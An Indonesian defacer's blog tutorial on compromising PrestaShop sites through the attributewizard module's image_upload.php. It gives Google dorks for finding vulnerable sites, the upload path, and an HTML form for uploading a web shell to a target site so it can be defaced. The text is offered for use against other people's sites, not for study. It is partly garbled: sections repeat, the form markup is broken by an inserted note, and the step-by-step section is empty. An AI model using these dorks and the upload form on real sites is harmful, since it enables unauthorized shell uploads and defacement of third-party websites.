Deface Menggunakan Pretashop Attribute Upload
Halo para defacer , kali ini gua akan sedikit share tentang Tutorial Deface Menggunakan Pretashop Attribute Upload
kita sudah tau metode prestashop sebelumnya, tapi kali ini metodenya agak sedikit berbeda dengan yang sebelumnya , oke langsung saja kita bahas
Bahan :
Shell
CSRF
Kopi
Pacar
#############################################################################
Google Dork :
Exploit :
CSRF :
Step by Step :
kita sudah tau metode prestashop sebelumnya, tapi kali ini metodenya agak sedikit berbeda dengan yang sebelumnya , oke langsung saja kita bahas
Bahan :
Shell
CSRF
Kopi
Pacar
#############################################################################
Google Dork :
inurl:/modules/attributewizard(use ur briant )
inurl:modules/attributewizard/disable_json.php
Exploit :
/modules/attributewizard/image_upload.phpcontoh : www.site.com/modules/attributewizard/image_upload.php
CSRF :
<form method="POST" action="www.Target.com/modules/attributewizard/image_upload.php"Vulnerability: Akan Muncul tulisan ERROR
enctype="multipart/form-data">
<input type="file" name="userfiles" /><button>Hajar !</button>
</form>
Step by Step :
Post a Comment